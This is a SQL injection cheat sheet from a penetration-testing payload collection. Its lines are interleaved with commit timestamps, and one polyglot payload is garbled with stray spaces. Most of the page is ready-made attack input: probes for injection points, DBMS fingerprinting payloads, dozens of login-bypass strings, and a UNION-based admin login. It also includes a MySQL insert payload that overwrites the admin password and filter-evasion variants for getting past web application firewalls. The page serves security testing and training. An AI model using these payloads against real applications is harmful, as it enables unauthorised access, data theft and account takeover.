2022-10-12 10:13:55 +00:00
# SQL Injection
2018-08-12 21:30:22 +00:00
2018-12-27 23:27:15 +00:00
> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
Attempting to manipulate SQL queries may have goals including:
2024-11-02 21:47:30 +00:00
2018-12-27 23:27:15 +00:00
- Information Leakage
- Disclosure of stored data
- Manipulation of stored data
2022-08-09 09:02:21 +00:00
- Bypassing authorization controls
2016-10-18 08:01:56 +00:00
2018-05-16 21:33:14 +00:00
## Summary
2018-08-12 21:30:22 +00:00
2023-04-14 15:45:45 +00:00
* [CheatSheets ](#cheatsheets )
* [MSSQL Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md )
* [MySQL Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md )
* [OracleSQL Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md )
* [PostgreSQL Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md )
* [SQLite Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md )
* [Cassandra Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md )
* [HQL Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md )
* [DB2 Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md )
2024-11-02 21:47:30 +00:00
* [SQLmap Cheatsheet ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md )
2018-05-20 20:10:33 +00:00
* [Entry point detection ](#entry-point-detection )
* [DBMS Identification ](#dbms-identification )
* [Authentication bypass ](#authentication-bypass )
2020-05-24 12:09:46 +00:00
* [Authentication Bypass (Raw MD5 SHA1) ](#authentication-bypass-raw-md5-sha1 )
2018-05-20 20:10:33 +00:00
* [Polyglot injection ](#polyglot-injection-multicontext )
2018-09-20 21:52:07 +00:00
* [Routed injection ](#routed-injection )
2018-05-20 20:10:33 +00:00
* [Insert Statement - ON DUPLICATE KEY UPDATE ](#insert-statement---on-duplicate-key-update )
2023-09-03 12:26:03 +00:00
* [Generic WAF Bypass ](#generic-waf-bypass )
* [White spaces alternatives ](#white-spaces-alternatives )
* [No Comma Allowed ](#no-comma-allowed )
* [No Equal Allowed ](#no-equal-allowed )
* [Case modification ](#case-modification )
2018-05-16 21:33:14 +00:00
2024-01-21 20:39:23 +00:00
## Tools
* [sqlmapproject/sqlmap ](https://github.com/sqlmapproject/sqlmap ) - Automatic SQL injection and database takeover tool
* [r0oth3x49/ghauri ](https://github.com/r0oth3x49/ghauri ) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
2016-11-29 16:27:35 +00:00
## Entry point detection
2018-08-12 21:30:22 +00:00
2024-11-02 21:47:30 +00:00
Detecting the entry point in SQL injection (SQLi) involves identifying locations in an application where user input is not properly sanitized before it is included in SQL queries.
2018-08-12 21:30:22 +00:00
2023-09-03 12:26:03 +00:00
* **Error Messages**: Inputting special characters (e.g., a single quote ') into input fields might trigger SQL errors. If the application displays detailed error messages, it can indicate a potential SQL injection point.
2024-11-02 21:47:30 +00:00
* Simple characters: `'` , `"` , `;` , `)` and `*`
* Simple characters encoded: `%27` , `%22` , `%23` , `%3B` , `%29` and `%2A`
* Multiple encoding: `%%2727` , `%25%27`
* Unicode characters: `U+02BA` , `U+02B9`
* MODIFIER LETTER DOUBLE PRIME (`U+02BA` encoded as `%CA%BA` ) is transformed into `U+0022` QUOTATION MARK (`)
* MODIFIER LETTER PRIME (`U+02B9` encoded as `%CA%B9` ) is transformed into `U+0027` APOSTROPHE (')
2023-09-03 12:26:03 +00:00
* **Tautology-Based SQL Injection**: By inputting tautological (always true) conditions, you can test for vulnerabilities. For instance, entering `admin' OR '1'='1` in a username field might log you in as the admin if the system is vulnerable.
* Merging characters
```sql
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
```
* Logic Testing
```sql
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
```
* **Timing Attacks**: Inputting SQL commands that cause deliberate delays (e.g., using `SLEEP` or `BENCHMARK` functions in MySQL) can help identify potential injection points. If the application takes an unusually long time to respond after such input, it might be vulnerable.
2018-08-12 21:30:22 +00:00
2018-04-12 21:23:41 +00:00
2018-04-27 21:31:58 +00:00
## DBMS Identification
2018-08-12 21:30:22 +00:00
2024-11-02 21:47:30 +00:00
### DBMS Identification Keyword Based
Certain SQL keywords are specific to particular database management systems (DBMS). By using these keywords in SQL injection attempts and observing how the website responds, you can often determine the type of DBMS in use.
| DBMS | SQL Payload |
| ------------------- | ------------------------------- |
| MySQL | `conv('a',16,2)=conv('a',16,2)` |
| MySQL | `connection_id()=connection_id()` |
| MySQL | `crc32('MySQL')=crc32('MySQL')` |
| MSSQL | `BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)` |
| MSSQL | `@@CONNECTIONS>0` |
| MSSQL | `@@CONNECTIONS=@@CONNECTIONS` |
| MSSQL | `@@CPU_BUSY=@@CPU_BUSY` |
| MSSQL | `USER_ID(1)=USER_ID(1)` |
| ORACLE | `ROWNUM=ROWNUM` |
| ORACLE | `RAWTOHEX('AB')=RAWTOHEX('AB')` |
| ORACLE | `LNNVL(0=123)` |
| POSTGRESQL | `5::int=5` |
| POSTGRESQL | `5::integer=5` |
| POSTGRESQL | `pg_client_encoding()=pg_client_encoding()` |
| POSTGRESQL | `get_current_ts_config()=get_current_ts_config()` |
| POSTGRESQL | `quote_literal(42.5)=quote_literal(42.5)` |
| POSTGRESQL | `current_database()=current_database()` |
| SQLITE | `sqlite_version()=sqlite_version()` |
| SQLITE | `last_insert_rowid()>1` |
| SQLITE | `last_insert_rowid()=last_insert_rowid()` |
| MSACCESS | `val(cvar(1))=1` |
| MSACCESS | `IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0` |
### DBMS Identification Error Based
Different DBMSs return distinct error messages when they encounter issues. By triggering errors and examining the specific messages sent back by the database, you can often identify the type of DBMS the website is using.
| DBMS | Example Error Message | Example Payload |
| ------------------- | -----------------------------------------------------------------------------------------|-----------------|
2024-05-26 14:40:54 +00:00
| MySQL | `You have an error in your SQL syntax; ... near '' at line 1` | `'` |
| PostgreSQL | `ERROR: unterminated quoted string at or near "'"` | `'` |
| PostgreSQL | `ERROR: syntax error at or near "1"` | `1'` |
| Microsoft SQL Server| `Unclosed quotation mark after the character string ''.` | `'` |
| Microsoft SQL Server| `Incorrect syntax near ''.` | `'` |
| Microsoft SQL Server| `The conversion of the varchar value to data type int resulted in an out-of-range value.` | `1'` |
| Oracle | `ORA-00933: SQL command not properly ended` | `'` |
| Oracle | `ORA-01756: quoted string not properly terminated` | `'` |
| Oracle | `ORA-00923: FROM keyword not found where expected` | `1'` |
2021-03-24 21:26:23 +00:00
2017-05-29 18:41:05 +00:00
## Authentication bypass
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2016-11-29 16:27:35 +00:00
'-'
' '
'& '
'^'
'*'
2018-05-16 21:33:14 +00:00
' or 1=1 limit 1 -- -+
'="or'
2016-11-29 16:27:35 +00:00
' or ''-'
' or '' '
' or ''& '
' or ''^'
' or ''*'
2018-07-07 10:04:55 +00:00
'-||0'
"-||0"
2016-11-29 16:27:35 +00:00
"-"
" "
"& "
"^"
"*"
2020-04-21 09:26:49 +00:00
'--'
"--"
2020-04-21 09:31:18 +00:00
'--' / "--"
2016-11-29 16:27:35 +00:00
" or ""-"
" or "" "
" or ""& "
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
2017-09-13 21:55:29 +00:00
or 2 like 2
2016-11-29 16:27:35 +00:00
or 1=1
2017-05-29 18:41:05 +00:00
or 1=1--
2016-11-29 16:27:35 +00:00
or 1=1#
or 1=1/*
admin' --
2019-03-21 16:44:37 +00:00
admin' -- -
2016-11-29 16:27:35 +00:00
admin' #
admin'/*
2017-09-13 21:55:29 +00:00
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
2016-11-29 16:27:35 +00:00
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
2024-09-16 16:05:54 +00:00
admin';--
2016-11-29 16:27:35 +00:00
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
2020-05-24 12:09:46 +00:00
## Authentication Bypass (Raw MD5 SHA1)
2018-09-10 21:12:29 +00:00
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
```php
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
```php
md5("ffifdyop", true) = 'or'6<> ]<5D> <> !r,<2C> <> b
2020-05-24 12:09:46 +00:00
sha1("3fDf ", true) = Q<> u'='<27> @<40> [<5B> t<EFBFBD> - o<> <6F> _-!
2018-09-10 21:12:29 +00:00
```
Challenge demo available at [http://web.jarvisoj.com:32772 ](http://web.jarvisoj.com:32772 )
2016-11-29 16:27:35 +00:00
## Polyglot injection (multicontext)
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2016-10-18 06:39:17 +00:00
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
2020-07-04 17:00:56 +00:00
/* MySQL only */
IF(SUBSTR(@@version,1,1)< 5 , BENCHMARK ( 2000000 , SHA1 ( 0xDE7EC71F1 ) ) , SLEEP ( 1 ) ) / * ' XOR ( IF ( SUBSTR ( @ @ version , 1 , 1 ) < 5 , BENCHMARK ( 2000000 , SHA1 ( 0xDE7EC71F1 ) ) , SLEEP ( 1 ) ) ) OR ' | " XOR ( IF ( SUBSTR ( @ @ version , 1 , 1 ) < 5 , BENCHMARK ( 2000000 , SHA1 ( 0xDE7EC71F1 ) ) , SLEEP ( 1 ) ) ) OR " * /
2016-10-18 08:01:56 +00:00
```
2018-08-12 21:30:22 +00:00
## Routed injection
2018-05-20 20:10:33 +00:00
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
2017-05-29 18:41:05 +00:00
## Insert Statement - ON DUPLICATE KEY UPDATE
2018-08-12 21:30:22 +00:00
2017-02-15 23:29:33 +00:00
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2017-02-15 23:29:33 +00:00
Inject using payload:
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
2017-05-29 18:41:05 +00:00
2017-02-15 23:29:33 +00:00
The query would look like this:
INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input");
2017-05-29 18:41:05 +00:00
This query will insert a row for the user “attacker_dummy@example.com”. It will also insert a row for the user “admin@example.com”.
2017-02-15 23:29:33 +00:00
Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty".
2017-05-29 18:41:05 +00:00
2017-02-15 23:29:33 +00:00
After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
```
2016-12-03 18:03:59 +00:00
2023-09-03 12:26:03 +00:00
## Generic WAF Bypass
2018-08-12 21:30:22 +00:00
2023-09-03 12:26:03 +00:00
### White spaces alternatives
2016-12-03 18:03:59 +00:00
2023-09-03 12:26:03 +00:00
* No space allowed (`%20`) - bypass using whitespace alternatives
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```
* No whitespace - bypass using comments
```sql
?id=1/*comment*/and/**/1=1/**/--
```
* No Whitespace - bypass using parenthesis
```sql
?id=(1)and(1)=(1)--
```
* Whitespace alternatives by DBMS
```sql
-- Example of query where spaces were replaced by ascii characters above 0x80
♀SELECT§*⌂FROM☺users♫WHERE♂1☼=¶1‼
```
| DBMS | ASCII characters in hexadicimal |
| ---------- | ------------------------------- |
| SQLite3 | 0A, 0D, 0C, 09, 20 |
| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 |
| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 |
2021-11-01 03:25:08 +00:00
| PostgreSQL | 0A, 0D, 0C, 09, 20 |
| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 |
2023-09-03 12:26:03 +00:00
| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 |
2021-11-01 03:25:08 +00:00
2023-09-03 12:26:03 +00:00
### No Comma Allowed
2021-11-01 03:25:08 +00:00
Bypass using OFFSET, FROM and JOIN
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2016-12-04 13:26:42 +00:00
LIMIT 0,1 -> LIMIT 1 OFFSET 0
2017-05-29 18:41:05 +00:00
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
2016-12-04 13:26:42 +00:00
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
2016-12-03 18:03:59 +00:00
```
2023-09-03 12:26:03 +00:00
### No Equal Allowed
2021-11-01 03:25:08 +00:00
Bypass using LIKE/NOT IN/IN/BETWEEN
2019-02-17 21:56:09 +00:00
```sql
?id=1 and substring(version(),1,1)like(5)
?id=1 and substring(version(),1,1)not in(4,3)
?id=1 and substring(version(),1,1)in(4,3)
2019-10-28 15:26:28 +00:00
?id=1 and substring(version(),1,1) between 3 and 4
2019-02-17 21:56:09 +00:00
```
2023-09-03 12:26:03 +00:00
2021-11-01 03:25:08 +00:00
### Case modification
2023-09-03 12:26:03 +00:00
* Bypass using uppercase/lowercase (see keyword AND)
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```
* Bypass using keywords case insensitive / Bypass using an equivalent operator
```sql
AND -> & &
OR -> ||
= -> LIKE,REGEXP, BETWEEN, not < and not >
> X -> not between 0 and X
WHERE -> HAVING
```
2021-11-01 03:25:08 +00:00
2022-10-02 06:13:01 +00:00
## Labs
* [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data ](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data )
* [SQL injection vulnerability allowing login bypass ](https://portswigger.net/web-security/sql-injection/lab-login-bypass )
* [SQL injection with filter bypass via XML encoding ](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding )
* [SQL Labs ](https://portswigger.net/web-security/all-labs#sql-injection )
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2018-04-12 21:23:41 +00:00
* Detect SQLi
2018-08-12 21:30:22 +00:00
* [Manual SQL Injection Discovery Tips ](https://gerbenjavado.com/manual-sql-injection-discovery-tips/ )
* [NetSPI SQL Injection Wiki ](https://sqlwiki.netspi.com/ )
2016-11-06 05:42:50 +00:00
* MySQL:
2019-05-24 15:15:33 +00:00
* [PentestMonkey's mySQL injection cheat sheet ](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet )
* [Reiners mySQL injection Filter Evasion Cheatsheet ](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/ )
2018-08-12 21:30:22 +00:00
* [Alternative for Information_Schema.Tables in MySQL ](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/ )
* [The SQL Injection Knowledge base ](https://websec.ca/kb/sql_injection )
2018-05-20 20:10:33 +00:00
* MSSQL:
2019-05-24 15:15:33 +00:00
* [EvilSQL's Error/Union/Blind MSSQL Cheatsheet ](http://evilsql.com/main/page2.php )
* [PentestMonkey's MSSQL SQLi injection Cheat Sheet ](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet )
2016-11-06 05:42:50 +00:00
* ORACLE:
2019-05-24 15:15:33 +00:00
* [PentestMonkey's Oracle SQLi Cheatsheet ](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet )
2016-11-06 05:42:50 +00:00
* POSTGRESQL:
2019-05-24 15:15:33 +00:00
* [PentestMonkey's Postgres SQLi Cheatsheet ](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet )
2016-11-06 05:42:50 +00:00
* Others
2018-08-12 21:30:22 +00:00
* [SQLi Cheatsheet - NetSparker ](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ )
2019-05-24 15:15:33 +00:00
* [Access SQLi Cheatsheet ](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html )
* [PentestMonkey's Ingres SQL Injection Cheat Sheet ](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet )
* [Pentestmonkey's DB2 SQL Injection Cheat Sheet ](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet )
* [Pentestmonkey's Informix SQL Injection Cheat Sheet ](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet )
* [SQLite3 Injection Cheat sheet ](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet )
* [Ruby on Rails (Active Record) SQL Injection Guide ](http://rails-sqli.org/ )
2018-08-12 21:30:22 +00:00
* [ForkBombers SQLMap Tamper Scripts Update ](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html )
* [SQLi in INSERT worse than SELECT ](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/ )
* [Manual SQL Injection Tips ](https://gerbenjavado.com/manual-sql-injection-discovery-tips/ )
2018-02-23 12:48:51 +00:00
* Second Order:
2018-08-12 21:30:22 +00:00
* [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection ](https://www.notsosecure.com/analyzing-cve-2018-6376/ )
* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper ](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/ )
2018-03-12 08:17:31 +00:00
* Sqlmap:
2018-09-20 21:52:07 +00:00
* [#SQLmap protip @zh4ck ](https://twitter.com/zh4ck/status/972441560875970560 )
2021-11-01 03:25:08 +00:00
* WAF:
* [SQLi Optimization and Obfuscation Techniques ](https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf ) by Roberto Salgado
* [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection ](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/ )